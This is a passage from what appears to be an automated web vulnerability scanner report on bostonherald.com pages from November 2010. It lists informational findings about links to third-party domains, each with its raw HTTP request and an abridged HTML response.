http://cache.heraldinteractive.com/images/version5.0/site_images/tools_mobile_small.gif
http://cache.heraldinteractive.com/images/version5.0/site_images/tools_news_tips_small.gif
http://cache.heraldinteractive.com/images/version5.0/site_images/tools_rss_small.gif
http://cache.heraldinteractive.com/js/ajax.js
http://cache.heraldinteractive.com/js/businessSummary.js
http://cache.heraldinteractive.com/js/common.js
http://cache.heraldinteractive.com/js/navigation.js
http://cache.heraldinteractive.com/js/scriptaculous/global.js
http://cache.heraldinteractive.com/js/tab_control.js
http://edge.quantserve.com/quant.js
http://feeds.feedburner.com/bostonherald/news/national/
http://img.video.ap.org/p/j/apovn.js
http://multimedia.heraldinteractive.com/images/20101106/stp/ed087c_carol.jpg
http://multimedia.heraldinteractive.com/images/20101106/stp/f741d6_walkerfile_11072010.jpg
http://multimedia.heraldinteractive.com/images/20101107/stp/2e69c0_miner.jpg
http://multimedia.heraldinteractive.com/images/20101107/stp/319550_gene.jpg
http://multimedia.heraldinteractive.com/images/20101107/stp/55f979_petit.jpg
http://multimedia.heraldinteractive.com/images/20101107/stp/74a1d9_okla.jpg
http://multimedia.heraldinteractive.com/images/20101107/stp/756430_news.jpg
http://pixel.quantserve.com/pixel/p-352ZWwG8I7OVQ.gif
http://twitter.com/bostonherald
http://widget.newsinc.com/_fw/bostonherald/toppicks_bostonherald_top.html
http://www.carfind.com/
http://www.collegeanduniversity.net/herald/
http://www.facebook.com/pages/BostonHeraldcom/197211981599
http://www.facebook.com/plugins/activity.php?site=http%253A%252F%252Fbostonherald.com&width=300&height=300&header=true&colorscheme=light&font&border_color
http://www.heraldmedia.com/privacy.html
http://www.homefind.com/
http://www.legacy.com/obituaries/bostonherald/
http://www.quantcast.com/p-352ZWwG8I7OVQ
http://www.uclick.com/client/boh/sudoc/

Request

GET /news/national/?srvc=news&position=also HTTP/1.1
Host: bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: bhfont=12; tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2960%3Bkvq%3D2789%3Bkvq%3D2517%3Bkvq%3D2516%3Bkvq%3D2513%3Bkvq%3D2512%3Bkvq%3D2504%3Bkvq%3D2098%3Bkvq%3D2089%3Bkvq%3D2082%3Bkvq%3D2078%3Bkvq%3D1130%3Bkvq%3D1129%3Bkvq%3D1128%3Bkvq%3D1127%3Bkvq%3D963%3Bkvq%3D773; __utmz=1.1289175481.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); bhpopup=on; OAX=rnoX2kzXQXwACWRq; __utma=1.247838239.1289175481.1289175481.1289175481.1; __utmc=1; __utmb=1.3.10.1289175481; __qca=P0-1292731211-1289175424376; RMFD=011PFFPzO101yed8; clientId=c488e846-1720-dMzs-k80V-lGgGUc54zAOC;

Response

HTTP/1.1 200 OK
Date: Mon, 08 Nov 2010 01:34:10 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 56188

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>



   <link rel="alternate" title="National - News & Opinion - BostonHerald.com" href="http://feeds.feedburner.com/bostonherald/news/national/" type="application/rss+xml">
<script type="text/javascript" language="JavaScript">
...[SNIP]...
<noscript>
<img src="http://b.scorecardresearch.com/b?c1=2&c2=6151562&c3=www.bostonherald.com&c4=www.bostonherald.com%2Fnews%2Fnational%2F&c5=&c6=&c15=" style="display:none" width="0" height="0" alt="" />
</noscript>
...[SNIP]...
<a href="/"><img src="http://cache.heraldinteractive.com/images/siteImages/edge/edgeBlank.gif" class="headerLogoSpacer"></a>
...[SNIP]...
<li id="obits" class="tab" onmouseover="this.className=this.className+'Hover'; return false;" onmouseout="this.className=this.className.replace('Hover',''); " onclick=""><a href="http://www.legacy.com/obituaries/bostonherald/">Obituaries</a>
...[SNIP]...
<a class="alt" href="javascript:void(0);">Features <img src="http://cache.heraldinteractive.com/images/siteImages/icons/arrow_drop_down.png" alt="Features">


<iframe style="position: relative; margin-bottom: 16px;" src="http://widget.newsinc.com/_fw/bostonherald/toppicks_bostonherald_top.html" height="225" width="300" scrolling="no" frameborder="0"/></iframe>
...[SNIP]...
<div class="gutter_teaseInner" style="padding:0 0 0 4px">

<script type="text/javascript" src="http://img.video.ap.org/p/j/apovn.js "></script>
...[SNIP]...
</h1>
                    <img style="width:50px; height:50px; padding:5px; background-color:#ddd; border:none" src="http://cache.heraldinteractive.com/images/siteImages/reporters/howie_carr.gif" alt="Howie Carr" />
                <div class="byline">
...[SNIP]...
</h1>
                    <img style="width:50px; height:50px; padding:5px; background-color:#ddd; border:none" src="http://cache.heraldinteractive.com/images/siteImages/reporters/margery_eagan.gif" alt="Margery Eagan" />
                <div class="byline">
...[SNIP]...
<div style="display:none;">
<iframe src="http://www.facebook.com/plugins/activity.php?site=http%253A%252F%252Fbostonherald.com&width=300&height=300&header=true&colorscheme=light&font&border_color" scrolling="no" frameborder="0" style="border:none; overflow:hidden; width:300px; height:300px;" allowTransparency="true"></iframe>
...[SNIP]...
<h2><a href="http://www.carfind.com/">Carfind</a>
...[SNIP]...
<h2><a href="http://www.homefind.com/">Homefind</a>
...[SNIP]...
<h2><a href="http://www.collegeanduniversity.net/herald/">Education Channel</a>
...[SNIP]...
<h2><a href="http://www.uclick.com/client/boh/sudoc/" target="_new">Play Sudoku!</a>
...[SNIP]...
<br/>
        No portion of BostonHerald.com or its content may be reproduced without the owner's written permission. <a href="http://www.heraldmedia.com/privacy.html">Privacy Commitment</a>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://edge.quantserve.com/quant.js"></script>
<noscript>
<a href="http://www.quantcast.com/p-352ZWwG8I7OVQ" target="_blank"><img
src="http://pixel.quantserve.com/pixel/p-352ZWwG8I7OVQ.gif" style="display:
none;" border="0" height="1" width="1" alt="Quantcast"/></a>
...[SNIP]...

8.25. http://bostonherald.com/news/offbeat/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://bostonherald.com
Path:	/news/offbeat/

Issue detail

The page was loaded from a URL containing a query string:

http://bostonherald.com/news/offbeat/?srvc=news&position=also

The response contains the following links to other domains:

http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js
http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects
http://b.scorecardresearch.com/b?c1=2&c2=6151562&c3=www.bostonherald.com&c4=www.bostonherald.com%2Fnews%2Foffbeat%2F&c5=&c6=&c15=
http://bostonherald.boocoo.com/
http://cache.heraldinteractive.com/images/siteImages/edge/edgeBlank.gif
http://cache.heraldinteractive.com/images/siteImages/icons/arrow_drop_down.png
http://cache.heraldinteractive.com/images/siteImages/icons/social_media/16px/facebook.png
http://cache.heraldinteractive.com/images/siteImages/icons/social_media/16px/twitter.png
http://cache.heraldinteractive.com/images/version5.0/site_images/tools_enews_small.gif
http://cache.heraldinteractive.com/images/version5.0/site_images/tools_home_delivery_small.gif
http://cache.heraldinteractive.com/images/version5.0/site_images/tools_mobile_small.gif
http://cache.heraldinteractive.com/images/version5.0/site_images/tools_news_tips_small.gif
http://cache.heraldinteractive.com/images/version5.0/site_images/tools_rss_small.gif
http://cache.heraldinteractive.com/js/ajax.js
http://cache.heraldinteractive.com/js/businessSummary.js
http://cache.heraldinteractive.com/js/common.js
http://cache.heraldinteractive.com/js/navigation.js
http://cache.heraldinteractive.com/js/scriptaculous/global.js
http://cache.heraldinteractive.com/js/tab_control.js
http://edge.quantserve.com/quant.js
http://feeds.feedburner.com/bostonherald/news/offbeat/
http://img.video.ap.org/p/j/apovn.js
http://multimedia.heraldinteractive.com/images/20101030/stp/1d0aba_family_10310201.jpg
http://multimedia.heraldinteractive.com/images/20101103/stp/aaed20_wayne.jpg
http://multimedia.heraldinteractive.com/images/20101104/stp/ffc469_men20100723.jpg
http://multimedia.heraldinteractive.com/images/20101105/stp/d4081f_ltpdisguise.jpg
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://pixel.quantserve.com/pixel/p-352ZWwG8I7OVQ.gif
http://twitter.com/bostonherald
http://widget.newsinc.com/_fw/bostonherald/toppicks_bostonherald_top.html
http://www.carfind.com/
http://www.collegeanduniversity.net/herald/
http://www.facebook.com/pages/BostonHeraldcom/197211981599
http://www.facebook.com/plugins/activity.php?site=http%253A%252F%252Fbostonherald.com&width=300&height=300&header=true&colorscheme=light&font&border_color
http://www.heraldmedia.com/privacy.html
http://www.homefind.com/
http://www.legacy.com/obituaries/bostonherald/
http://www.quantcast.com/p-352ZWwG8I7OVQ
http://www.uclick.com/client/boh/sudoc/

Request

GET /news/offbeat/?srvc=news&position=also HTTP/1.1
Host: bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: bhfont=12; tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2960%3Bkvq%3D2789%3Bkvq%3D2517%3Bkvq%3D2516%3Bkvq%3D2513%3Bkvq%3D2512%3Bkvq%3D2504%3Bkvq%3D2098%3Bkvq%3D2089%3Bkvq%3D2082%3Bkvq%3D2078%3Bkvq%3D1130%3Bkvq%3D1129%3Bkvq%3D1128%3Bkvq%3D1127%3Bkvq%3D963%3Bkvq%3D773; __utmz=1.1289175481.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); bhpopup=on; OAX=rnoX2kzXQXwACWRq; __utma=1.247838239.1289175481.1289175481.1289175481.1; __utmc=1; __utmb=1.3.10.1289175481; __qca=P0-1292731211-1289175424376; RMFD=011PFFPzO101yed8; clientId=c488e846-1720-dMzs-k80V-lGgGUc54zAOC;

Response

HTTP/1.1 200 OK
Date: Mon, 08 Nov 2010 01:47:41 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 52589

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>



<link rel="alternate" title="Offbeat News - News & Opinion - BostonHerald.com" href="http://feeds.feedburner.com/bostonherald/news/offbeat/" type="application/rss+xml">
<script type="text/javascript" language="JavaScript">
...[SNIP]...
<noscript>
<img src="http://b.scorecardresearch.com/b?c1=2&c2=6151562&c3=www.bostonherald.com&c4=www.bostonherald.com%2Fnews%2Foffbeat%2F&c5=&c6=&c15=" style="display:none" width="0" height="0" alt="" />
</noscript>
...[SNIP]...
<a href="/"><img src="http://cache.heraldinteractive.com/images/siteImages/edge/edgeBlank.gif" class="headerLogoSpacer"></a>
...[SNIP]...
<li id="obits" class="tab" onmouseover="this.className=this.className+'Hover'; return false;" onmouseout="this.className=this.className.replace('Hover',''); " onclick=""><a href="http://www.legacy.com/obituaries/bostonherald/">Obituaries</a>
...[SNIP]...
<a class="alt" href="javascript:void(0);">Features <img src="http://cache.heraldinteractive.com/images/siteImages/icons/arrow_drop_down.png" alt="Features">

<iframe style="position: relative; margin-bottom: 16px;" src="http://widget.newsinc.com/_fw/bostonherald/toppicks_bostonherald_top.html" height="225" width="300" scrolling="no" frameborder="0"/></iframe>
...[SNIP]...
<div class="gutter_teaseInner" style="padding:0 0 0 4px">

<script type="text/javascript" src="http://img.video.ap.org/p/j/apovn.js "></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
<div style="display:none;">
<iframe src="http://www.facebook.com/plugins/activity.php?site=http%253A%252F%252Fbostonherald.com&width=300&height=300&header=true&colorscheme=light&font&border_color" scrolling="no" frameborder="0" style="border:none; overflow:hidden; width:300px; height:300px;" allowTransparency="true"></iframe>
...[SNIP]...
<h2><a href="http://www.carfind.com/">Carfind</a>
...[SNIP]...
<h2><a href="http://www.homefind.com/">Homefind</a>
...[SNIP]...
<h2><a href="http://www.collegeanduniversity.net/herald/">Education Channel</a>
...[SNIP]...
<h2><a href="http://www.uclick.com/client/boh/sudoc/" target="_new">Play Sudoku!</a>
...[SNIP]...
<br/>
No portion of BostonHerald.com or its content may be reproduced without the owner's written permission. <a href="http://www.heraldmedia.com/privacy.html">Privacy Commitment</a>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://edge.quantserve.com/quant.js"></script>
<noscript>
<a href="http://www.quantcast.com/p-352ZWwG8I7OVQ" target="_blank"><img
src="http://pixel.quantserve.com/pixel/p-352ZWwG8I7OVQ.gif" style="display:
none;" border="0" height="1" width="1" alt="Quantcast"/></a>
...[SNIP]...

8.26. http://bostonherald.com/news/opinion/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://bostonherald.com
Path:	/news/opinion/

Issue detail

The page was loaded from a URL containing a query string:

http://bostonherald.com/news/opinion/?srvc=news&position=also

The response contains the following links to other domains:

http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js
http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects
http://b.scorecardresearch.com/b?c1=2&c2=6151562&c3=www.bostonherald.com&c4=www.bostonherald.com%2Fnews%2Fopinion%2F&c5=&c6=&c15=
http://bh.heraldinteractive.com/images/version5.0/site_images/holbert_logo.gif
http://bostonherald.boocoo.com/
http://cache.heraldinteractive.com/images/siteImages/edge/edgeBlank.gif
http://cache.heraldinteractive.com/images/siteImages/icons/arrow_drop_down.png
http://cache.heraldinteractive.com/images/siteImages/icons/social_media/16px/facebook.png
http://cache.heraldinteractive.com/images/siteImages/icons/social_media/16px/twitter.png
http://cache.heraldinteractive.com/images/siteImages/reporters/howie_carr.gif
http://cache.heraldinteractive.com/images/siteImages/reporters/margery_eagan.gif
http://cache.heraldinteractive.com/images/version5.0/site_images/bh_paper_logo.gif
http://cache.heraldinteractive.com/images/version5.0/site_images/tools_enews_small.gif
http://cache.heraldinteractive.com/images/version5.0/site_images/tools_home_delivery_small.gif
http://cache.heraldinteractive.com/images/version5.0/site_images/tools_mobile_small.gif
http://cache.heraldinteractive.com/images/version5.0/site_images/tools_news_tips_small.gif
http://cache.heraldinteractive.com/images/version5.0/site_images/tools_rss_small.gif
http://cache.heraldinteractive.com/js/ajax.js
http://cache.heraldinteractive.com/js/businessSummary.js
http://cache.heraldinteractive.com/js/common.js
http://cache.heraldinteractive.com/js/navigation.js
http://cache.heraldinteractive.com/js/scriptaculous/global.js
http://cache.heraldinteractive.com/js/tab_control.js
http://edge.quantserve.com/quant.js
http://feeds.feedburner.com/bostonherald/news/opinion/
http://multimedia.heraldinteractive.com/images/galleries/20101104/promo/6b239c_holbert20101105.jpg
http://pixel.quantserve.com/pixel/p-352ZWwG8I7OVQ.gif
http://twitter.com/bostonherald
http://widget.newsinc.com/_fw/bostonherald/toppicks_bostonherald_top.html
http://www.carfind.com/
http://www.collegeanduniversity.net/herald/
http://www.facebook.com/pages/BostonHeraldcom/197211981599
http://www.facebook.com/plugins/activity.php?site=http%253A%252F%252Fbostonherald.com&width=300&height=300&header=true&colorscheme=light&font&border_color
http://www.heraldmedia.com/privacy.html
http://www.homefind.com/
http://www.legacy.com/obituaries/bostonherald/
http://www.quantcast.com/p-352ZWwG8I7OVQ
http://www.uclick.com/client/boh/sudoc/

Request

GET /news/opinion/?srvc=news&position=also HTTP/1.1
Host: bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: bhfont=12; tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2960%3Bkvq%3D2789%3Bkvq%3D2517%3Bkvq%3D2516%3Bkvq%3D2513%3Bkvq%3D2512%3Bkvq%3D2504%3Bkvq%3D2098%3Bkvq%3D2089%3Bkvq%3D2082%3Bkvq%3D2078%3Bkvq%3D1130%3Bkvq%3D1129%3Bkvq%3D1128%3Bkvq%3D1127%3Bkvq%3D963%3Bkvq%3D773; __utmz=1.1289175481.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); bhpopup=on; OAX=rnoX2kzXQXwACWRq; __utma=1.247838239.1289175481.1289175481.1289175481.1; __utmc=1; __utmb=1.3.10.1289175481; __qca=P0-1292731211-1289175424376; RMFD=011PFFPzO101yed8; clientId=c488e846-1720-dMzs-k80V-lGgGUc54zAOC;

Response

HTTP/1.1 200 OK
Date: Mon, 08 Nov 2010 01:30:07 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 52928

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>



   <link rel="alternate" title="Opinion - News & Opinion - BostonHerald.com" href="http://feeds.feedburner.com/bostonherald/news/opinion/" type="application/rss+xml">
<script type="text/javascript" language="JavaScript">
...[SNIP]...
<noscript>
<img src="http://b.scorecardresearch.com/b?c1=2&c2=6151562&c3=www.bostonherald.com&c4=www.bostonherald.com%2Fnews%2Fopinion%2F&c5=&c6=&c15=" style="display:none" width="0" height="0" alt="" />
</noscript>
...[SNIP]...
<a href="/"><img src="http://cache.heraldinteractive.com/images/siteImages/edge/edgeBlank.gif" class="headerLogoSpacer"></a>
...[SNIP]...
<li id="obits" class="tab" onmouseover="this.className=this.className+'Hover'; return false;" onmouseout="this.className=this.className.replace('Hover',''); " onclick=""><a href="http://www.legacy.com/obituaries/bostonherald/">Obituaries</a>
...[SNIP]...
<a class="alt" href="javascript:void(0);">Features <img src="http://cache.heraldinteractive.com/images/siteImages/icons/arrow_drop_down.png" alt="Features">

<iframe style="position: relative; margin-bottom: 16px;" src="http://widget.newsinc.com/_fw/bostonherald/toppicks_bostonherald_top.html" height="225" width="300" scrolling="no" frameborder="0"/></iframe>
...[SNIP]...
<div class="gutter_teaseInner" style="line-height:18px">
<img src="http://cache.heraldinteractive.com/images/version5.0/site_images/bh_paper_logo.gif" style="float:right; margin:0 0 5px 5px; clear:both">
Send your opinions to: Letters, BostonHerald, PO Box 5584, Boston, MA 02205-5843 or email them to <a href="mailto:letterstoeditor@bostonherald.com">
...[SNIP]...
</h1>
                    <img style="width:50px; height:50px; padding:5px; background-color:#ddd; border:none" src="http://cache.heraldinteractive.com/images/siteImages/reporters/howie_carr.gif" alt="Howie Carr" />
                <div class="byline">
...[SNIP]...
</h1>
                    <img style="width:50px; height:50px; padding:5px; background-color:#ddd; border:none" src="http://cache.heraldinteractive.com/images/siteImages/reporters/margery_eagan.gif" alt="Margery Eagan" />
                <div class="byline">
...[SNIP]...
<div style="display:none;">
<iframe src="http://www.facebook.com/plugins/activity.php?site=http%253A%252F%252Fbostonherald.com&width=300&height=300&header=true&colorscheme=light&font&border_color" scrolling="no" frameborder="0" style="border:none; overflow:hidden; width:300px; height:300px;" allowTransparency="true"></iframe>
...[SNIP]...
<h2><a href="http://www.carfind.com/">Carfind</a>
...[SNIP]...
<h2><a href="http://www.homefind.com/">Homefind</a>
...[SNIP]...
<h2><a href="http://www.collegeanduniversity.net/herald/">Education Channel</a>
...[SNIP]...
<h2><a href="http://www.uclick.com/client/boh/sudoc/" target="_new">Play Sudoku!</a>
...[SNIP]...
<br/>
        No portion of BostonHerald.com or its content may be reproduced without the owner's written permission. <a href="http://www.heraldmedia.com/privacy.html">Privacy Commitment</a>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://edge.quantserve.com/quant.js"></script>
<noscript>
<a href="http://www.quantcast.com/p-352ZWwG8I7OVQ" target="_blank"><img
src="http://pixel.quantserve.com/pixel/p-352ZWwG8I7OVQ.gif" style="display:
none;" border="0" height="1" width="1" alt="Quantcast"/></a>
...[SNIP]...

8.27. http://bostonherald.com/news/opinion/editorials/view.bg previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://bostonherald.com
Path:	/news/opinion/editorials/view.bg

Issue detail

The page was loaded from a URL containing a query string:

http://bostonherald.com/news/opinion/editorials/view.bg?articleid=1294504&srvc=home&position=emailed

The response contains the following links to other domains:

http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js
http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects,builder
http://b.scorecardresearch.com/b?c1=2&c2=6151562&c3=www.bostonherald.com&c4=www.bostonherald.com%2Fnews%2Fopinion%2Feditorials%2Fview%2F20101107gm_bailout_the_sequel%2F&c5=&c6=&c15=
http://bostonherald.boocoo.com/
http://bostonheraldnie.newspaperdirect.com/
http://cache.heraldinteractive.com/images/siteImages/edge/edgeBlank.gif
http://cache.heraldinteractive.com/images/siteImages/icons/arrow_drop_down.png
http://cache.heraldinteractive.com/images/siteImages/icons/fontLarge.gif
http://cache.heraldinteractive.com/images/siteImages/icons/fontSmall.gif
http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniArticle.gif
http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniComments.gif
http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniEmail.gif
http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniPrint.gif
http://cache.heraldinteractive.com/images/siteImages/icons/social_media/16px/facebook.png
http://cache.heraldinteractive.com/images/siteImages/icons/social_media/16px/twitter.png
http://cache.heraldinteractive.com/images/version5.0/site_images/mlf.gif
http://cache.heraldinteractive.com/images/version5.0/site_images/nie.gif
http://cache.heraldinteractive.com/images/version5.0/site_images/nieSmart.gif
http://cache.heraldinteractive.com/js/ajax.js?nocache=1234
http://cache.heraldinteractive.com/js/businessSummary.js
http://cache.heraldinteractive.com/js/common.js?1=21
http://cache.heraldinteractive.com/js/dropdown.js
http://cache.heraldinteractive.com/js/navigation.js
http://cache.heraldinteractive.com/js/scriptaculous/global.js
http://cache.heraldinteractive.com/js/tab_control.js?1=21
http://d.yimg.com/ds/badge2.js
http://edge.quantserve.com/quant.js
http://feeds.feedburner.com/bostonherald/news/opinion/editorials/
http://hotjobs.yahoo.com/job-search;_ylc=X3oDMTFka204b2luBF9TAzM5NjUxMTI1MQRwYXJ0bmVyA2Jvc3RvbmhlcmFsZARzcmMDY29uc29sZQ--?partner=bostonherald&kw=bostonherald.com&locations=Boston%2C+MA&metro_search_proxy=1&metro_search=1&industry=
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://pixel.quantserve.com/pixel/p-352ZWwG8I7OVQ.gif
http://s7.addthis.com/js/200/addthis_widget.js
http://twitter.com/bostonherald
http://widget.newsinc.com/_fw/bostonherald/toppicks_bostonherald_top.html
http://www.addthis.com/bookmark.php?v=20
http://www.bostonheraldineducation.com/
http://www.carfind.com/
http://www.facebook.com/pages/BostonHeraldcom/197211981599
http://www.heraldmedia.com/privacy.html
http://www.homefind.com/
http://www.legacy.com/obituaries/bostonherald/
http://www.massliteracy.org/
http://www.quantcast.com/p-352ZWwG8I7OVQ

Request

GET /news/opinion/editorials/view.bg?articleid=1294504&srvc=home&position=emailed HTTP/1.1
Host: bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: bhfont=12; tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2960%3Bkvq%3D2789%3Bkvq%3D2517%3Bkvq%3D2516%3Bkvq%3D2513%3Bkvq%3D2512%3Bkvq%3D2504%3Bkvq%3D2098%3Bkvq%3D2089%3Bkvq%3D2082%3Bkvq%3D2078%3Bkvq%3D1130%3Bkvq%3D1129%3Bkvq%3D1128%3Bkvq%3D1127%3Bkvq%3D963%3Bkvq%3D773; __utmz=1.1289175481.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); bhpopup=on; OAX=rnoX2kzXQXwACWRq; __utma=235728274.418299420.1289175424.1289175424.1289175424.1; __utmc=235728274; __utmb=235728274.16.10.1289175424; __qca=P0-1292731211-1289175424376; RMFD=011PFFPzO101yed8|O1021J6R; clientId=c488e846-1720-dMzs-k80V-lGgGUc54zAOC;

Response

HTTP/1.1 200 OK
Date: Mon, 08 Nov 2010 07:12:03 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 38357

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>



<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js"></script>
<script src="http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects,builder" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/tab_control.js?1=21" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/businessSummary.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/dropdown.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/common.js?1=21" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/javascript"></script>


       <script src="http://cache.heraldinteractive.com/js/ajax.js?nocache=1234" type="text/javascript"></script>
...[SNIP]...
</script>

   <script src="http://cache.heraldinteractive.com/js/navigation.js" type="text/javascript"></script>
...[SNIP]...
<noscript>
<img src="http://b.scorecardresearch.com/b?c1=2&c2=6151562&c3=www.bostonherald.com&c4=www.bostonherald.com%2Fnews%2Fopinion%2Feditorials%2Fview%2F20101107gm_bailout_the_sequel%2F&c5=&c6=&c15=" style="display:none" width="0" height="0" alt="" />
</noscript>
...[SNIP]...
<a href="/">
<img src="http://cache.heraldinteractive.com/images/siteImages/edge/edgeBlank.gif" class="headerLogoSpacer">
</a>
...[SNIP]...
<li id="obits" class="tab" onmouseover="this.className=this.className+'Hover'; return false;" onmouseout="this.className=this.className.replace('Hover',''); " onclick=""><a href="http://www.legacy.com/obituaries/bostonherald/">Obituaries</a>
...[SNIP]...
<a class="alt" href="javascript:void(0);">Features <img src="http://cache.heraldinteractive.com/images/siteImages/icons/arrow_drop_down.png" alt="Features">

<script type="text/javascript" src="http://s7.addthis.com/js/200/addthis_widget.js"></script>
...[SNIP]...
</script>

<a href="http://www.addthis.com/bookmark.php?v=20" onmouseover="return addthis_open(this, '', '[URL]', 'GM bailout: The sequel');" onmouseout="addthis_close();" onclick="return addthis_sendto();"><img class="line_icon" src="/images/siteImages/icons/share-icon-16x16.png" width="16" height="16" alt="Bookmark and Share" style="border:0"/>
...[SNIP]...
</script>
<script type="text/javascript" src="http://d.yimg.com/ds/badge2.js" badgetype="text"></script>
...[SNIP]...
<a href="/news/opinion/editorials/view.bg?articleid=1294504&format=comments#CommentsArea"><img class="iconImage" src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniComments.gif"
alt="Comments" />(3) Comments  |  Post / Read Comments</a>
...[SNIP]...
<div id="nextArticleTease" style="display:block">
<img src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniArticle.gif"> <b>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...

<iframe src="http://widget.newsinc.com/_fw/bostonherald/toppicks_bostonherald_top.html" height="225" width="300" scrolling="no" frameborder="0"/></iframe>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
<span style="bold"><a href="http://hotjobs.yahoo.com/job-search;_ylc=X3oDMTFka204b2luBF9TAzM5NjUxMTI1MQRwYXJ0bmVyA2Jvc3RvbmhlcmFsZARzcmMDY29uc29sZQ--?partner=bostonherald&kw=bostonherald.com&locations=Boston%2C+MA&metro_search_proxy=1&metro_search=1&industry=" target="_new">Jobs with Herald Media</a>
...[SNIP]...
<div style="padding:15px; text-align:center;">
<a href="http://www.bostonheraldineducation.com" target=_new"><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/nie.gif" alt="N.I.E." /></a>
<a href="http://bostonheraldnie.newspaperdirect.com" target=_new"><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/nieSmart.gif" alt="Smart Edition" /></a>
<a href="http://www.massliteracy.org" target=_new"><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/mlf.gif" alt="Mass Literacy Foundation" /></a>
...[SNIP]...
<br />No portion of BostonHerald.com or its content may be reproduced without the owner's written permission. <a href="http://www.heraldmedia.com/privacy.html">Privacy Commitment</a>
...[SNIP]...
<noscript>
<img src="http://b.scorecardresearch.com/b?c1=2&c2=6151562&c3=www.bostonherald.com&c4=www.bostonherald.com%2Fnews%2Fopinion%2Feditorials%2Fview%2F20101107gm_bailout_the_sequel%2F&c5=&c6=&c15=" style="display:none" width="0" height="0" alt="" />
</noscript>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://edge.quantserve.com/quant.js"></script>
<noscript>
<a href="http://www.quantcast.com/p-352ZWwG8I7OVQ" target="_blank"><img
src="http://pixel.quantserve.com/pixel/p-352ZWwG8I7OVQ.gif" style="display:
none;" border="0" height="1" width="1" alt="Quantcast"/></a>
...[SNIP]...

8.28. http://bostonherald.com/news/police_logs/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://bostonherald.com
Path:	/news/police_logs/

Issue detail

The page was loaded from a URL containing a query string:

http://bostonherald.com/news/police_logs/?srvc=news&position=also

The response contains the following links to other domains:

http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js
